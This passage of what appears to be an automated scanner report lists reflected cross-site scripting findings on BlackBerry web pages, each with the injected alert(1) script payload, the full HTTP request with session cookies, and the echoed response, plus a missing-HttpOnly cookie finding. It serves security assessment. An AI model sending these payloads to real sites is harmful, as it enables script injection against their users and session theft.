Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrytorch/wheretoDetails.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77962"><script>alert(1)</script>5f55230e052 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /smartphones/blackberrytorch/77962"><script>alert(1)</script>5f55230e052?cache=false&ajax=true HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/smartphones/blackberrytorch/#!where-to-buy
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: pointOfPurchaseUniqueSet=true; favorableUniqueSet=true; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619549646}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/9; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=fortnelson; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:53 GMT
Date: Wed, 24 Nov 2010 22:54:53 GMT
Connection: close
Content-Length: 21935


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrytorch/77962"><script>alert(1)</script>5f55230e052/" />
...[SNIP]...

1.39. http://us.blackberry.com/smartphones/blackberrytorch/wheretoDetailsHero.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrytorch/wheretoDetailsHero.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c757d"><script>alert(1)</script>36f59b98188 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartphones/blackberrytorchc757d"><script>alert(1)</script>36f59b98188/wheretoDetailsHero.jsp?cache=false HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/smartphones/blackberrytorch/#!where-to-buy
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: pointOfPurchaseUniqueSet=true; favorableUniqueSet=true; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619549646}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/9; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=fortnelson; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:48 GMT
Date: Wed, 24 Nov 2010 22:54:48 GMT
Connection: close
Content-Length: 21963


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrytorchc757d"><script>alert(1)</script>36f59b98188/wheretoDetailsHero.jsp" />
...[SNIP]...

1.40. http://us.blackberry.com/smartphones/blackberrytorch/wheretoDetailsHero.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/blackberrytorch/wheretoDetailsHero.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd093"><script>alert(1)</script>3a478b99ee1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /smartphones/blackberrytorch/bd093"><script>alert(1)</script>3a478b99ee1?cache=false HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/smartphones/blackberrytorch/#!where-to-buy
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: pointOfPurchaseUniqueSet=true; favorableUniqueSet=true; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619549646}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/9; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=fortnelson; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:50 GMT
Date: Wed, 24 Nov 2010 22:54:50 GMT
Connection: close
Content-Length: 21921


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/blackberrytorch/bd093"><script>alert(1)</script>3a478b99ee1/" />
...[SNIP]...

1.41. http://us.blackberry.com/smartphones/compare/compareCart.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/compare/compareCart.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a143a"><script>alert(1)</script>ccd4aeee772 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartphones/comparea143a"><script>alert(1)</script>ccd4aeee772/compareCart.jsp?_=1290619520675&show=compareCart HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; s_cc=true; dfa_cookie=rimglobal%2Crimbbus; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_p1=1@15@d/2210/2334&e/2; s_sv_s1=1@16@a//1290619520282

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Expires: 0
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Wed, 24 Nov 2010 22:54:47 GMT
Connection: close
Set-Cookie: server_instance=edmonton; Path=/
Set-Cookie: JSESSIONID=ABF3ADD95D71E25FDC901725C0AD3610; Path=/
Content-Length: 21958


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/comparea143a"><script>alert(1)</script>ccd4aeee772/compareCart.jsp" />
...[SNIP]...

1.42. http://us.blackberry.com/smartphones/compare/compareCart.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/compare/compareCart.jsp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a57b"><script>alert(1)</script>4d184f8985 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /smartphones/compare/5a57b"><script>alert(1)</script>4d184f8985?_=1290619520675&show=compareCart HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; s_cc=true; dfa_cookie=rimglobal%2Crimbbus; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_p1=1@15@d/2210/2334&e/2; s_sv_s1=1@16@a//1290619520282

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:49 GMT
Date: Wed, 24 Nov 2010 22:54:49 GMT
Connection: close
Content-Length: 21928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/compare/5a57b"><script>alert(1)</script>4d184f8985/" />
...[SNIP]...

1.43. http://us.blackberry.com/smartphones/modalContent.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/modalContent.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50c31"><script>alert(1)</script>bce2549c75d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /smartphones/50c31"><script>alert(1)</script>bce2549c75d?modalid=shareMenu&url=http://us.blackberry.com/smartphones/ HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/smartphones/
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: favorableUniqueSet=true; s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Adevices%25253ADevices%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fus.blackberry.com%25252Fsmartphones%25252F%252523shareMenu%2526ot%253DA%2526oi%253D521; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619549646}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/7; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:52 GMT
Date: Wed, 24 Nov 2010 22:54:52 GMT
Connection: close
Content-Length: 21941


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/smartphones/50c31"><script>alert(1)</script>bce2549c75d/" />
...[SNIP]...

1.44. http://us.blackberry.com/smartphones/modalContent.jsp [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /smartphones/modalContent.jsp

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e731c"><script>alert(1)</script>00d5407db45 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartphones/modalContent.jsp?modalid=shareMenu&url=http://us.blackberry.com/smartphones/e731c"><script>alert(1)</script>00d5407db45 HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://us.blackberry.com/smartphones/
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: favorableUniqueSet=true; s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Adevices%25253ADevices%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fus.blackberry.com%25252Fsmartphones%25252F%252523shareMenu%2526ot%253DA%2526oi%253D521; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619549646}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/7; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:54:45 GMT
Date: Wed, 24 Nov 2010 22:54:45 GMT
Connection: close
Content-Length: 2978

<!-- template-body -->


   <div class="shareModal modalSprite">
       <div class="content">
                   <div class="label">Share</div>
                   <a class="cta close" href="#" target="_blank"></a
...[SNIP]...
<a onclick="shareLinkClicked(this.innerHTML);" href="http://buzz.yahoo.com/buzz?targetUrl=http://us.blackberry.com/smartphones/e731c"><script>alert(1)</script>00d5407db45?CPID=OTC-SHAREYAHOOBUZZ" class="iconB modalSprite icon" target="_blank">
...[SNIP]...

1.45. http://us.blackberry.com/where-to-buy/att/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /where-to-buy/att/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35258"><script>alert(1)</script>fbefee99acc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /where-to-buy/att35258"><script>alert(1)</script>fbefee99acc/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: us.blackberry.com
Cookie: pointOfPurchaseUniqueSet=true; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":4,"to":3,"c":"http://us.blackberry.com/where-to-buy/united-states/","lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1290619569784,"l":"en-US","i":-1}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@16@d/2210/2334&e/10; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; fsr.r={"d":90,"i":"1290619537652_749032","e":1291224374976}; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:17 GMT
Date: Wed, 24 Nov 2010 22:55:17 GMT
Connection: close
Content-Length: 21886


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/where-to-buy/att35258"><script>alert(1)</script>fbefee99acc/" />
...[SNIP]...

1.46. http://us.blackberry.com/where-to-buy/united-states/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://us.blackberry.com
Path:   /where-to-buy/united-states/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab0ca"><script>alert(1)</script>ed6a40b1979 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /where-to-buy/united-statesab0ca"><script>alert(1)</script>ed6a40b1979/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://us.blackberry.com/where-to-buy/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: us.blackberry.com
Proxy-Connection: Keep-Alive
Cookie: pointOfPurchaseUniqueSet=true; s_cc=true; s_sq=rimglobal%2Crimbbus%3D%2526pid%253Dus%25253Abb%25253Apurchase%25253APurchase%2526pidt%253D1%2526oid%253DView%252520smartphone%252520options%2526oidt%253D3%2526ot%253DSUBMIT%2526oi%253D684; s_sv_sid=951204897142; s_sv_s1=1@16@a//1290619520282; fsr.s={"v":1,"rid":"1290619537652_749032","ru":"http://us.blackberry.com/","r":"us.blackberry.com","st":"","pv":3,"to":3,"c":"http://us.blackberry.com/navigation/search.do","lc":{"d0":{"v":3,"s":true}},"cd":0,"sd":0,"f":1290619549646}; bb_ipgeo=http%3A%2F%2Fus.blackberry.com%2F; BLLY=3gSqxXCb_Ji9b_oLpHSl7idWWujulYDZexd35vuW4seCDsDsQMoey7A; dfa_cookie=rimglobal%2Crimbbus; s_sv_p1=1@15@d/2210/2334&e/9; s_vi=[CS]v1|26769F12851D2E4E-4000010BE04011CF[CE]; server_instance=edmonton; JSESSIONID=A6B51404C694BD8400F36C6950B7C00D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 24 Nov 2010 22:55:20 GMT
Date: Wed, 24 Nov 2010 22:55:20 GMT
Connection: close
Content-Length: 21906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!
...[SNIP]...
<link rel="canonical" href="http://us.blackberry.com/where-to-buy/united-statesab0ca"><script>alert(1)</script>ed6a40b1979/" />
...[SNIP]...

1.47. http://www.blackberry.com/btsc/microsites/search.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackberry.com
Path:   /btsc/microsites/search.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91733"><script>alert(1)</script>95980e881b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /btsc/microsites/search.do?91733"><script>alert(1)</script>95980e881b2=1 HTTP/1.1
Host: www.blackberry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServerMKEX04NA_HA_Web_Applications=589821194.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 24 Nov 2010 16:35:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=532E4999CCE84020C9FCCE399492FAAC; Path=/btsc
Set-Cookie: BIGipServerBTSC_KSS1_80=2792964362.20480.0000; path=/
Connection: close
Content-Length: 132280


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>BlackBerry Technica
...[SNIP]...
<TextArea name="91733"><script>alert(1)</script>95980e881b2" style="display:none;visibility:hide">
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.blackberry.com
Path:   /btsc/microsites/js//js/custom_functions.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /btsc/microsites/js//js/custom_functions.js HTTP/1.1
Host: www.blackberry.com
Proxy-Connection: keep-alive
Referer: http://www.blackberry.com/btsc/microsites/search.do?91733%22%3E%3Cscript%3Ealert(1)%3C/script%3E95980e881b2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=532E4999CCE84020C9FCCE399492FAAC; s_vi=[CS]v1|2676A072051D2E5C-400001338043ADE5[CE]; CP=null*; BLLY=3V52KTzZgRwwiqS0ZkXafxn3jZ8pMmePRqPWT13w8znNReheU-SwWGA; s_nr=1290621174762; s_sv_p1=1@16@d/2210/2334&e/10; BIGipServerBTSC_KSS1_80=2792964362.20480.0000

Response

HTTP/1.1 404 /btsc/microsites/js//js/custom_functions.js
Date: Thu, 25 Nov 2010 00:59:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=UTF-8
